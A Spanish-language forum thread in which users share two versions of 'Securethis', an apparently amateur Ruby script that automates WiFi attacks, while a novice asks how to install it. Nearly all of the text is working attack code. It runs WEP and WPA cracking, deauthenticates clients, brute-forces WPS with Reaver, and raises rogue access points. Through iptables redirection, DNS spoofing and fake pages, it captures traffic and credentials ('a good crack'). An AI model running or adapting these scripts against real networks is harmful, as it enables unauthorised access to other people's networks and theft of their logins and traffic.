0 Usuarios y 1 Visitante están viendo este tema.
sudo apt-get install rubysudo apt-get install rubygems1.8sudo apt-get install rubygems1.9.1sudo apt-get install libgtk2-ruby1.8
ruby install.rb
ruby Securethis.rb
no lo entiendo muy bien soy muy novato en todo esto i no se perdonarme si soy muí tozudo pero necesito alguna aclarazion mas especializada para gente como yo que no sabemos nada de como baesto
Esto es para linux NO para Windows
como descargar esto y instalarlo en mi programa que yo uso en linux
he seguido los pasos que medio koala63 pero no nada nos encuentra nada mas medie
#!/usr/bin/env ruby# encoding: utf-8puts "Este script instalará las dependencias necesarias al funcionamiento de Securethis, solo teneís que estar atento en cuando el terminal le pregunta Y para Yes (si) y N para No. El tiempo de instalación dependera de la calidad de su conexión y de su computadora, podeís ajustar el tiempo entre cada instalación modificando el valor de los comandos "sleep" a dentro del script con un editor de texto, nano, gedit, mousepad, leafpad etc..." sleep 60system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install dsniff &> /dev/null &") sleep 60system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install wireshark &> /dev/null &") sleep 90system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install dhcp3-server &> /dev/null &") sleep 90system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install apache2 &> /dev/null &") sleep 150system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install libapache2-mod-php5 &> /dev/null &")`sudo a2enmod php5``sudo service apache2 restart``sudo gem install --no-rdoc --no-ri highline`
#!/usr/bin/env ruby# encoding: utf-8require "rubygems"require "highline/import"puts "Elegir su objetivo con airodump-ng y prensar ctrl+c para el paso siguiente"sleep 10system ("airmon-ng start wlan0")sleep 5system ("airodump-ng mon0")def wepinjsystem ("ifconfig") puts "Ahora entrar cuidadosamente la dirección mac de su objetivo"mac=""mac=gets.chomp$mac=macputs "El escaneo de redes se va a iniciar, elegir su objetivo y prensar ctrl+c para seguir adelante"sleep 5system ("airodump-ng --encrypt wep mon0") puts "Introducir un nombre para el fichero de capturas"nom=""nom=gets.chomp$nom=nom puts "Entrar el nombre de la red (eSSID)"essid=""essid=gets.chomp$essid=essid puts "Introducir el canal de la red (CH)"ch=""ch=gets.chomp$ch=ch puts "Introducir la dirección mac de la red (BSSID)"bssid=""bssid=gets.chomp$bssid=bssidsystem ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")sleep 5system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")sleep 1800system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")enddef weppsystem ("ifconfig") puts "Ahora elegir su dirrección MAC y prensar Enter, tener mucho cuidado cuando entréis la dirección mac"mac=""mac=gets.chomp$mac=macputs "El escaneo de redes se va a iniciar, elegir su objetivo y prensar ctrl+c para seguir adelante"sleep 5system ("airodump-ng --encrypt wep mon0") puts "Introducir un nombre para el fichero de capturas"nom=""nom=gets.chomp$nom=nom puts "Entrar el nombre de la red (eSSID)"essid=""essid=gets.chomp$essid=essid puts "Introducir canal de la red (CH)"ch=""ch=gets.chomp$ch=ch puts "Introducir dirección mac de la red (BSSID)"bssid=""bssid=gets.chomp$bssid=bssidsystem ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")sleep 5system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")sleep 1800system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")enddef wpadico puts "El escaneo de redes se va a iniciar, elegir su objetivo y prensar ctrl+c para seguir adelante"sleep 5system ("airodump-ng --encrypt wpa mon0") puts "Introducir un nombre para el fichero de capturas"nom=""nom=gets.chomp$nom=nom puts "Entrar el nombre de la red (eSSID)"essid=""essid=gets.chomp$essid=essid puts "Introducir canal de la red (CH)"ch=""ch=gets.chomp$ch=ch puts "Introducir dirección mac de la red (BSSID)"bssid=""bssid=gets.chomp$bssid=bssid puts "Entrar mac del cliente (STATION)"station=""station=gets.chomp$station=stationsystem ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 150 -a #{$bssid} -c #{$station} mon0 &> /dev/null &")sleep 148puts "Entrar nombre del diccionario a utilizar"dico=""dico=gets.chomp$dico=dicosystem ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")enddef wpalocal puts "El escaneo de redes se va a iniciar, elegir su objetivo y prensar ctrl+c para seguir adelante"sleep 5system ("airodump-ng --encrypt wpa mon0") puts "Introducir nombre de la red (ESSID)"essid=""essid=gets.chomp$essid=essid puts "Introducir canal de la red (CH)"ch=""ch=gets.chomp$ch=ch puts "Introducir dirección mac de la red (BSSID)"bssid=""bssid=gets.chomp$bssid=bssid puts "Creación de la rogue AP"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")sleep 3`ifconfig at0 up``ifconfig at0 10.0.0.1 netmask 255.255.255.0``ifconfig at0 mtu 1400``echo > dhcpd.leases``iptables --flush``iptables --table nat --flush``iptables --delete-chain``iptables --table nat --delete-chain``route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null``iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1``iptables -P FORWARD ACCEPT``iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80` puts "Reglas iptables establecidas, reinicio de dhcp3"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &") puts "Activación y configuración de apache y dnsspoof"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &") puts "Lanzamiento de wireshark"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")enddef wparinternet puts "El escaneo de redes se va a iniciar, elegir su objetivo y prensar ctrl+c para seguir adelante"sleep 5system ("airodump-ng --encrypt wpa mon0") puts "Introducir nombre red (ESSID)"essid=""essid=gets.chomp$essid=essid puts "Introducir canal de la red (CH)"ch=""ch=gets.chomp$ch=ch puts "Introducir la dirrección (BSSID)"bssid=""bssid=gets.chomp$bssid=bssid puts "Creación de la rogue AP"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")sleep 3`ifconfig at0 up``ifconfig at0 10.0.0.1 netmask 255.255.255.0``ifconfig at0 mtu 1400``echo > dhcpd.leases``iptables --flush``iptables --table nat --flush``iptables --delete-chain``iptables --table nat --delete-chain``iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE` puts "Reglas iptables establecidas, reinicio de dhcp3"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &") puts "configuración y lanzamiento de apache y dnsspoof"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")enddef hostapd puts("Punto de acsesso en modo "Hostpad". Adaptado para hacer un MITM discreto. Asegúrense de que su fichero hostpad.conf es correctamente configurado y que la ruta hacía el fichero es la correcta. Para empezar, cambiar la linea driver=hostapd por la siguiente driver=nl80211)")system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e hostapd /etc/hostapd/hostapd.conf &> /dev/null &")enddef deauth system ("ifconfig") puts("Elegir la interfaz para efectuar el ataque de desautenticación (prensar Enter si nquereís uzar la misma interfaz que la empleada para realizar su Punto de Acceso Rogue)")carte=""carte=gets.chomp$carte=cartesystem ("airmon-ng start #{$carte}")sleep 6system ("airodump-ng --encrypt wpa mon0")puts("Entrar el canal de la red objetivo (CH)")canal=""canal=gets.chomp$canal=canalputs("Entrar dirección mac de la red objetivo (BSSID)")bssid=""bssid=gets.chomp$bssid=bssidputs("entrar el nombre del fichero de captura airodump-ng")name=""name=gets.chomp$name=namesystem("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng --#{$canal} --#{$essid} --output-format csv -w #{$name} mon0 &> /dev/null &")sleep 5system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airdrop-ng -i mon0 -t #{$name}.csv -r /root/rules.txt -b -p &> /dev/null &")enddef planque puts "Airbase es capaz de encontrar las redes ocultas, solo esperen un poco y la red va a aparecer en su ventana airodump-ng"sleep 15system("airodump-ng --encrypt wpa mon0")puts "Seleccionar el canal de la red objetivo (CH)"ch=""ch=gets.chomp$ch=ch puts "Seleccionar la dirección mac del objetivo (BSSID)"bssid=""bssid=gets.chomp$bssid=bssidsystem("airodump-ng -c #{$ch} --bssid #{$bssid} mon0") puts "El punto de acceso Rogue con los parámetros de la red oculta esta en modo activo, vigilar su ventana airodump-ng y esperar a que aparezca el nombre de la red objetivo "sleep 10system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -a #{$bssid} -X mon0 &> /dev/null &")enddef metasploit puts "ANTES de ejecutar metasploit, si uzaís ubuntu o otra plataforma linux gran publico, asegúrense de tener todas las librerías necesarias al funcionamiento de metalsploit. El lanzamiento de la consola msfconsole puede tardar algo de tiempo... paciencia. Para volver al menú de securtethis, prensar exit en el terminal msfconsole"sleep 20system("msfconsole")enddef clean puts "Borrar su fichero index.html y php y todos losl css presentes en /var/www y poner en su sitio los nuevos ficheros que habéis elegido. Prensar CTRL+C Para parrar inmediatamente !"sleep 20`rm /var/www/index.php``rm /var/www/index.html``rm /var/www/valid.php``rm /var/www/*.css``rm /var/www/*.jpg``rm /var/www/*.ico`puts "Entrar nombre de la carpeta contenedora de las paginas falsas"name=""name=gets.chomp$name=nameDir.chdir '/root'`cp -rv #{$name} /var/www`enddef settings puts "COMPRUEBA y EDITA: los ficheros importantes necesarios a un buen crack"sleep 10`gedit /etc/dhcp3/dhcpd.conf``gedit /root/dns.txt``gedit /etc/hostapd/hostapd.conf``gedit /var/log/apache2/access.log``gedit /var/log/apache2/error.log`endbegin puts loop do choose do |menu| menu.prompt = "Por favor, elegir una opción" puts "################## Coded By Flow (Koala) #################" puts "################## Securethis V1.1 #################" puts " ######################### " puts " ############# " puts " ##### " puts " # " puts "~~~¿Es su red segura?~~~ " menu.choice(:Wepinjection, "inyección.") { wepinj() } menu.choice(:Wepp0841, "-p0841.") { wepp() } menu.choice(:Wpabruteforce, "ataque diccionario.") { wpadico() } menu.choice(:RogueAPlocal, "Rogue local unicamente.") { wparlocal() } menu.choice(:RogueAPinternet, "Rogue con internet.") { wparinternet() } menu.choice(:Hostapd, "Hostapd.") { hostapd() } menu.choice(:DeauthAttack, "airdrop-ng.") { deauth() } menu.choice(:HiddenNetwork, "red escondida.") { planque() } menu.choice(:Metasploit, "lanzamiento terminal msfconsole.") { metasploit() } menu.choice(:CleanApache2WARNING, "eleminar los ficheros del crack.") { clean() } menu.choice(:Settings, "Caja de herramientas.") { settings() } menu.choice(:Quit, "Salir del programa.") { exit } end endend
puts "CHECK and EDIT: Important file needed for a good crack"
he seguido los pasos que medio koala63
#!/usr/bin/env ruby# encoding: utf-8require "rubygems"require "highline/import"puts "Make a good choice with airodump and press ctrl+c for next step"sleep 10system ("airmon-ng start wlan0")sleep 5system ("airodump-ng mon0")def wepinjsystem ("ifconfig") puts "Now choose your MAC adress and press enter, warning to write as well the adress!"mac=""mac=gets.chomp$mac=macputs "Le scan de reseau va se lancer, choisissez votre reseau et appuyez sur ctrl+c pour continuer"sleep 5system ("airodump-ng --encrypt wep mon0") puts "Rentrez un nom pour le fichier de capture"nom=""nom=gets.chomp$nom=nom puts "Rentrez le nom du reseau (ESSID)"essid=""essid=gets.chomp$essid=essid puts "Rentrez le canal du reseau (CH)"ch=""ch=gets.chomp$ch=ch puts "Rentrez l'adresse du reseau (BSSID)"bssid=""bssid=gets.chomp$bssid=bssidsystem ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")sleep 5system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")sleep 1800system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")enddef weppsystem ("ifconfig") puts "Now choose your MAC adress and press enter, warning to write as well the adress!"mac=""mac=gets.chomp$mac=macputs "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"sleep 5system ("airodump-ng --encrypt wep mon0") puts "Rentrez un nom pour le fichier de capture"nom=""nom=gets.chomp$nom=nom puts "Rentrez le nom du reseau (ESSID)"essid=""essid=gets.chomp$essid=essid puts "Rentrez le canal du reseau (CH)"ch=""ch=gets.chomp$ch=ch puts "Rentrez l'adresse du reseau (BSSID)"bssid=""bssid=gets.chomp$bssid=bssidsystem ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")sleep 5system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")sleep 1800system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")enddef wpadico puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"sleep 5system ("airodump-ng --encrypt wpa mon0") puts "Rentrez un nom pour le fichier de capture"nom=""nom=gets.chomp$nom=nom puts "Rentrez le nom du reseau (ESSID)"essid=""essid=gets.chomp$essid=essid puts "Rentrez le canal du reseau (CH)"ch=""ch=gets.chomp$ch=ch puts "Rentrez l'adresse du reseau (BSSID)"bssid=""bssid=gets.chomp$bssid=bssid puts "Rentrez l'adresse de la personne connecte au reseau (STATION)"station=""station=gets.chomp$station=stationsystem ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 150 -a #{$bssid} -c #{$station} mon0 &> /dev/null &")sleep 148puts "Entrez le nom du dico a utiliser"dico=""dico=gets.chomp$dico=dicosystem ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")enddef wparlocal puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"sleep 5system ("airodump-ng --encrypt wpa mon0") puts "Rentrez le nom du reseau (ESSID)"essid=""essid=gets.chomp$essid=essid puts "Rentrez le canal du reseau (CH)"ch=""ch=gets.chomp$ch=ch puts "Creation de la rogue AP"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")sleep 3`ifconfig at0 up``ifconfig at0 10.0.0.1 netmask 255.255.255.0``ifconfig at0 mtu 1400``echo > dhcpd.leases``iptables --flush``iptables --table nat --flush``iptables --delete-chain``iptables --table nat --delete-chain``route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null``iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1``iptables -P FORWARD ACCEPT``iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80` puts "Regles iptables effectues, redemarrage de dhcp3"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &") puts "Mise en place de apache et dnsspoof"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &") puts "lancement de wireshark"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")enddef wparinternet puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"sleep 5system ("airodump-ng --encrypt wpa mon0") puts "Rentrez le nom du reseau (ESSID)"essid=""essid=gets.chomp$essid=essid puts "Rentrez le canal du reseau (CH)"ch=""ch=gets.chomp$ch=ch puts "Creation de la rogue AP"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")sleep 3`ifconfig at0 up``ifconfig at0 10.0.0.1 netmask 255.255.255.0``ifconfig at0 mtu 1400``echo > dhcpd.leases``iptables --flush``iptables --table nat --flush``iptables --delete-chain``iptables --table nat --delete-chain``iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE` puts "Regles iptables effectues, redemarrage de dhcp3"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &") puts "Mise en place de apache et dnsspoof"sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")sleep 3system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")enddef wpsputs("Reaver with ten seconds between two request on the acces point.WARNING if reaver is not installed yet in the system you have to go here: http://www.linuxtrack.com/t1427-Installer-Reaver-sur-Ubuntu.htm and follow the instructions")sleep 20 puts "Rentrez l'adresse du reseau (BSSID)"bssid=""bssid=gets.chomp$bssid=bssidsystem ("xterm -hold -bg '#000000' -fg '#3A94FF' -e reaver -i mon0 #{$bssid} -d 10 -vv &> /dev/null &")enddef sergioputs("MAKE SURE THE FORWADING IS ENABLED (echo 1 > /proc/sys/net/ipv4/ip_forward) Sergio is a powerful proxy open source and easy to use for capture any traffic in the web! for more information and download go to https://code.google.com/p/sergio-proxy/ special thanks to Antares145 and his tuto, can be found here: http://antaresnotebook.wordpress.com/2013/03/31/tuto-rogue-ap-episode-2-sniffing-de-base-et-un-peu-de-fun/")sleep 40system ("ifconfig") puts "Enter your ip adress"ip=""ip=gets.chompip=ip`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to #{$ip}:10000`Dir.chdir '/root/sergio/sergio-proxy'system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e ./sergio-proxy.py -l 10000 -w /tmp/log.txt &> /dev/null &")enddef hostapd puts("Hostapd access point mode, good to do a MITM more discreet (make sure your hostapd.conf has got a good configuration and the way to the folder is correct. to begin, remove the line driver=hostapd and replace it with driver=nl80211)")system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e hostapd /etc/hostapd/hostapd.conf &> /dev/null &")enddef deauth system ("ifconfig") puts("choose your network card to do the deauth (press enter if you want to use the same card as the rogue AP)")carte=""carte=gets.chomp$carte=cartesystem ("airmon-ng start #{$carte}")sleep 6system ("airodump-ng --encrypt wpa mon0")puts("enter the channel of the target network (CH)")canal=""canal=gets.chomp$canal=canalputs("enter the adress of the target network (BSSID)")bssid=""bssid=gets.chomp$bssid=bssidputs("enter the name of the file capture in airodump")name=""name=gets.chomp$name=namesystem("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng --#{$canal} --#{$essid} --output-format csv -w #{$name} mon0 &> /dev/null &")sleep 5system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airdrop-ng -i mon0 -t #{$name}.csv -r /root/rules.txt -b -p &> /dev/null &")enddef planque puts "Airbase can find a hidden network too, you have to wait a little and the network will appear in your airodump-ng windows"sleep 15system("airodump-ng --encrypt wpa mon0")puts "Select the channel of the target network (CH)"ch=""ch=gets.chomp$ch=ch puts "Select the bssid of the target network (BSSID)"bssid=""bssid=gets.chomp$bssid=bssidsystem("airodump-ng -c #{$ch} --bssid #{$bssid} mon0") puts "Rogue access point with parameters of the hidden network is in active mode, see airodump and wait for the name of this network"sleep 10system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -a #{$bssid} -X mon0 &> /dev/null &")enddef metasploit puts "BEFORE Lauching metasploit if you are on unbutu or other linux plateform make sure you have all the librairies to run properly metasploit.Lauching msfconsole, this could take a time...wait.Come back to Securethis menu pressing exit in msfconsole"sleep 20system("msfconsole")enddef clean puts "Remove your index.html and php and all css present into /var/www and replace with the new files you choose CTRL+C TO ABORT NOW!"sleep 20`rm /var/www/index.php``rm /var/www/index.html``rm /var/www/valid.php``rm /var/www/*.css``rm /var/www/*.jpg``rm /var/www/*.ico`puts "Now enter the name of your folder wich countain the fakes pages"name=""name=gets.chomp$name=nameDir.chdir '/root'`cp -rv #{$name} /var/www`enddef settings puts "CHECK and EDIT: Important file needed for a good crack"sleep 10`gedit /etc/dhcp3/dhcpd.conf``gedit /root/dns.txt``gedit /etc/hostapd/hostapd.conf``gedit /root/rules.txt``gedit /var/log/apache2/access.log``gedit /var/log/apache2/error.log`endbegin puts loop do choose do |menu| menu.prompt = "Please select option" puts "################## Coded By Flow (Koala) #################" puts "################## Securethis V1.1 #################" puts " ######################### " puts " ############# " puts " ##### " puts " # " puts "~~~Does your network is secure?~~~ " menu.choice(:Wepinjection, "injection.") { wepinj() } menu.choice(:Wepp0841, "-p0841.") { wepp() } menu.choice(:Wpabruteforce, "attaque par dico.") { wpadico() } menu.choice(:RogueAPlocal, "Rogue local seulement.") { wparlocal() } menu.choice(:RogueAPinternet, "Rogue avec internet.") { wparinternet() } menu.choice(:ReaverWPS, "Reaver.") { wps() } menu.choice(:Sniffing, "Utilisation de Sergio proxy.") { sergio() } menu.choice(:Hostapd, "Hostapd.") { hostapd() } menu.choice(:DeauthAttack, "airdrop-ng.") { deauth() } menu.choice(:HiddenNetwork, "reseau caché.") { planque() } menu.choice(:Metasploit, "lancement de msfconsole.") { metasploit() } menu.choice(:CleanApache2WARNING, "supprime les fichier du crack.") { clean() } menu.choice(:Settings, "Boite a outils.") { settings() } menu.choice(:Quit, "Quitter le prog.") { exit } end endend